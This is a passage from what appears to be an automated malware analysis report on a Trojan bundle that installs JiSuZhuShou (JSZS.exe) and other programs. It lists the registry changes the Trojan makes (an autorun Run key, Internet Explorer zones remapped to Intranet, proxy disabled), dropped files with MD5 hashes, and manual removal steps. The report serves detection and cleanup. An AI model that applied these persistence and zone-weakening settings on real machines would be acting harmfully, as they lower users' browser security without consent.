[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\JiSuZhuShou]
"stdd" = "dg op12c5EDet9FRZJzkQA=="
"udsk" = "A5 C6 E7 A7 5D 9C E4 40"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\JiSuZhuShou]
"JSZS.exe" = "æžÂ速助手"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"JiSuZhuShou" = "%Program Files%\JiSuZhuShou\JSZS.exe /A"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCU\Software\JiSuZhuShou]
"ci1"
"ci2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
The process JSZS.exe:3036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 C5 D3 EF 09 85 8B C2 4B 25 BD CE 97 4E A2 CC"
The process JSZS.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 6C FC B5 5A 83 DB 46 A2 8C 84 81 02 4F FB 9E"
Dropped PE files
MD5 | File path |
---|---|
efeac416d473fbefa1cfac1d46ab7ff0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\KillProcDLL.dll |
0a4fa7a9ba969a805eb0603c7cfe3378 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\ProcessWork.dll |
469a269cb39bbdcd1b0c87ad7f1671d6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\SkinBtn.dll |
cc037c4703d3ec257efeef2ce0a1a20e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\SkinProgress.dll |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\System.dll |
f0cb331dd4bd92a6ebce45e7cd1cf5ef | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\WndProc.dll |
e8f959245915c8effc15ec7cdc2f2118 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\inetc.dll |
dab87894fbe35c7008be708a3d45bdee | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\nsDialogs.dll |
77a26c23948070dc012bba65e7f390aa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\nsUnzip.dll |
8355212451b4addb7d9ccb61b9c03805 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\nsWindows.dll |
92148c2fcdc2c588aebc6acaef11ad4d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst14.tmp\nsisSlideshow.dll |
70e5fc026ab184266bfdc85c3e4d5d94 | c:\Program Files\JiSuZhuShou\AdbWinApi.dll |
71e5d7a4ebe2f05fa3cb2c41959bfac7 | c:\Program Files\JiSuZhuShou\AdbWinUsbApi.dll |
964938d226b5eae1828ce520cec6893f | c:\Program Files\JiSuZhuShou\JSHlp.exe |
91473b177de4bc787ed785889130e6ca | c:\Program Files\JiSuZhuShou\JSZS.exe |
6aff430d1b2d916594d2cb6bcbfe8aae | c:\Program Files\JiSuZhuShou\adb.exe |
a5bfb956b6709443218dc020623c8150 | c:\Program Files\JiSuZhuShou\uninst.exe |
7b0d7dd87c8c5c86cd6b96ff36f91188 | c:\Program Files\JiSuZhuShou\usbrasr.sys |
914af14995f41fc7f94c6b22026dd245 | c:\Program Files\JiSuZhuShou\x64\usbrasr.sys |
3336d1f7e730eb1108dfda3c1e2998dc | c:\Program Files\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73Server.exe |
adf7036aa656a1b35acc4226a86018f5 | c:\Program Files\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\uninst.exe |
fc715518841ebee04e47109b36c7d9eb | c:\Program Files\anote\anote.dll |
388f2e5993ab72cd819fc032c8a145ad | c:\Program Files\anote\anote.exe |
8496c663045a8f02a979e5404ebf6442 | c:\Program Files\anote\uninstall.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
-2100_1_ss.exe:1976
ksktiklit_505_s.exe:1556
Y73P2PSearcher_4.exe:2152
deployPkg.exe:2456
NewEyeNurse.exe:3868
eyeXzUvGuard_368.exe:3584
tusb_186_1.exe:584
setup_30015.exe:1220
JSZS.exe:3036
JSZS.exe:1480 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\mgbg_btn_clos.BMP (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsDialogs.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\inetc.dll (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\set.bmp (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\gpmc1.msi (766238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\Thumbs.db (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\SkinProgress.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\unchecked.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\gpmc1.zip (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\KillProcDLL.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\505.png (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\503.png (8368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsisSlideshow.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\ProcessWork.dll (7190 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.zchon[1].txt (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\bg.bmp (12280 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\ProgressBar.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsRandom.dll (409 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\checked.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\bg2.bmp (12280 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\tensile.bmp (14600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsUnzip.dll (3335 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\btn_btn.bmp (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\btn_mini.bmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\gpmc1.cab (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\502.png (4974 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\501.png (1207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setuphtparameter.txt (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].zip (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\504.png (3624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\unRadioButton.bmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\unset.bmp (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\btn_clos.BMP (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\progress.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\license.rtf (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\RadioButton.bmp (2 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\btn_in.bmp (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\mgbg.bmp (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\Slides.dat (510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsWindows.dll (10 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tj.sui17[1].txt (206 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[1].php (763 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\will[1].htm (374 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\z_stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Program Files%\JiSuZhuShou\JSZS.exe (55161 bytes)
%Program Files%\JiSuZhuShou\¼«ËÙÖúÊÖ.lnk (613 bytes)
%Program Files%\JiSuZhuShou\x64\usbrasr.sys (15305 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¼«ËÙÖúÊÖ\¼«ËÙÖúÊÖ.lnk (691 bytes)
%Program Files%\JiSuZhuShou\AdbWinApi.dll (3748 bytes)
%Program Files%\JiSuZhuShou\adb.exe (24009 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp\JSZS.exe (55161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp\System.dll (11 bytes)
%Program Files%\JiSuZhuShou\JSHlp.exe (24568 bytes)
%Program Files%\JiSuZhuShou\usbrasr.sys (11393 bytes)
%Program Files%\JiSuZhuShou\AdbWinUsbApi.dll (2733 bytes)
%Program Files%\JiSuZhuShou\uninst.exe (892 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¼«ËÙÖúÊÖ\öÃâ€ÃƒËœÃ‚¼Â«Ã‹Ã™Ã–úÊÖ.lnk (703 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\201572519\ImagePlugin.dll (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\libviewe.dll (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\unins000.exe (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\ImagePlugin.dll (50 bytes)
%Documents and Settings%\All Users\Application Data\201572519\msvcr120.dll (7345 bytes)
%Documents and Settings%\All Users\Application Data\201572519\deployPkg.exe (673 bytes)
%WinDir%\Tasks\Adobe Flash fastsee Files Update Ver 2015725.job (568 bytes)
%Documents and Settings%\All Users\Application Data\201572519\ui.dll (4545 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\快快看图(725)\ÃÂÞ¸´ÅäÖÃ\ÃÂÞ¸´ÅäÖÃ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\ui.dll (3744 bytes)
%Documents and Settings%\All Users\Application Data\201572519\libviewe.dll (10177 bytes)
%Documents and Settings%\All Users\Application Data\201572519\msvcp120.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\res.zip (144 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\快快看图(725)\快快看图.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\msvcp120.dll (1727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\msvcr120.dll (6403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\fastsee.exe (166 bytes)
%Documents and Settings%\All Users\Application Data\201572519\res.zip (673 bytes)
%Documents and Settings%\All Users\Application Data\201572519\unins000.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~kb15.tmp (9606 bytes)
%Documents and Settings%\All Users\Application Data\fastsee_Data\filecache.ini (574 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\setting.ini (32 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73Server.exe (9130 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73ÖÖ×ÓËÑË÷ÉñÆ÷.lnk (744 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\uninst.exe (745 bytes)
%Documents and Settings%\%current user%\Desktop\ÖÖ×ÓËÑË÷ÉñÆ÷.lnk (732 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73ÖÖ×ÓËÑË÷ÉñÆ÷.url (37 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\¹Ù·½Ö÷Ò³.url (37 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Uninstall.lnk (727 bytes)
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj3[1].htm (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_07.png (8 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\winlgView.exe (4380 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\text_14.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\NewEyeNurse.exe (7931 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃÂÂÒÃÂÑÛ¾¦\ÃÂÂÒÃÂÑÛ¾¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\close.jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_4.png (2443 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_05.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_05.png (9 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\xx_bg.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\zjm_12.png (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\gou.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\yb.jpg (1886 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\black.png (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_03.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\shezhi.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_2.png (3165 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\black.png (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\min.jpg (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\updateOver.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\min.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\jiancha.png (15 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\mstRelax.exe (6501 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\text_15.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_1.png (3487 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\skins.cfg (71 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\newEyeFun.dll (5250 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\zan.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\sure.png (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\xx_bg.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\nEyeNurse.dll (15437 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\cancel.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\AndroidAssistHelper.dll (12237 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\Q-SDK.exe (51217 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\jiancha.png (15 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\zan.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\300x250.jpg (14 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\sure.png (16 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_05.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\text_13.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_03.png (8 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bg.png (1962 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\black_10.png (934 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_07.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_5.png (3052 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\ts_bg.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_07.png (8 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\shezhi.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\black_10.png (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_03.png (8 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\min.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_09.png (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\close_j.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\close.jpg (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\ts_bg.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\newEyePro.dll (6466 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_2.png (3165 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\xiuxi.png (17 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\loading.gif (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\text_14.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_1.png (3487 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_05.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\banben.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\newEyePro.dll (6466 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\gou.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\unins000.exe (500 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\skins.edb (389 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\close.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\300x250.jpg (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\text_15.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\nEyeNurse.dll (15437 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\min.jpg (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_3.png (3202 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bg.png (1962 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\text_12.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\NEUpgrade.exe (4566 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_09.png (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\text_12.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\banben.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\close.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_4.png (2443 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_5.png (3052 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\skins.cfg (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_3.png (3202 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\winlgView.exe (4380 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\newEyeFun.dll (5250 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\updaterec.edb (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\update.html (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\close_j.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\upd.edb (10182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\mstRelax.exe (6501 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_03.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\zjm_12.png (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_07.png (24 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\Q-SDK.exe (51217 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\text_13.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\AndroidAssistHelper.dll (12237 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\yb.jpg (1886 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\cancel.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\xiuxi.png (17 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\skins.edb (389 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1B.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[2].php (764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7191_653[1].htm (661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\5[1].js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\shunfeiCL[1].js (387 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\vc.min[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\login[1].htm (16 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.91debug[1].txt (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\gdd9fid[1].swf (4428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg[1].swf (2638 bytes)
